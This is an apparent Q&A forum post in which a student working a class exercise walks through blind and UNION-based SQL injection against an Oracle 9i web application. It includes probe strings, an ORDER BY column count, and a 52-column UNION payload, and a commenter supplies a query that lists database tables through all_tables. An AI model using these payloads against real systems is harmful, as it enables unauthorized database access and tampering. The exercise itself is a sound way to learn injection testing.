# Blind SQL Injection Guidance

Tags: sql, oracle, odbc, sql-injection

So I'm doing an exercise for class and I'm having a bit of trouble understanding this particular database that I'm meant to break into blindly.

The database throws the following error with the string:
`x'`

`Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC driver for Oracle][Oracle]ORA-01756: quoted string not properly terminated`

showing that it is vulnerable.

Similarly, the database concatenates fine with a valid input aka `valid'||'input` returns the correct webpage for the input.

What confuses me is that the database does not throw an error when the input `x' --` is entered, but when the input `x'; --` is entered the db throws the following error:

`Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC driver for Oracle][Oracle]ORA-00911: invalid character`

I've also tried URL encoding the input so that it reads `x'%3b+--` or `x'%3b --` but it returns the same result.

Does anyone have any clue where to step next since it seems that I can't inject a semicolon `;` into a query?

Everything's an Edit Below This:

Edit 1: I got to thinking and thought I might be inside of a parenthetical block. I tried the input `x');` and it produces the following error:

`Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC driver for Oracle][Oracle]ORA-00933: SQL command not properly ended`

Edit 2:
Found out that the statement `validinput'order by 52--` produced a result, but `validinput'order by 53--` produced an error. I concluded the table has 52 columns.

I'm attempting `validinput' union select 1 from table_name` now, but it feels largely like a huge guessing game. I don't know what any of the table names could possibly be.

Edit 3:
My brain is honestly hurting at this point but I think I'm almost there...
The statement
`validnum'+union+select+null,2,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+dual--`

returned a legitimate page

Edit 4:
Followed Jeffrey Kemp's suggestion and I got a single table (the output seems to be limited to 1 row). Uh oh. More information though, the version is Oracle 9i, and I know the database name plus user name, and few of the tables through blind luck. The goal of the exercise is to change a value in one of the tables. However, I've run into difficulty getting the column names since the output is limited to 1 row. Any suggestions?

Comment: Try `validnum'+union+select+table_name,2,owner,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+all_tables--` (might have to change the position of the table_name and owner in the select list to match up with an expected varchar2 column)

Comment: If that works, and you get a list of tables, then you can start probing the contents of those tables.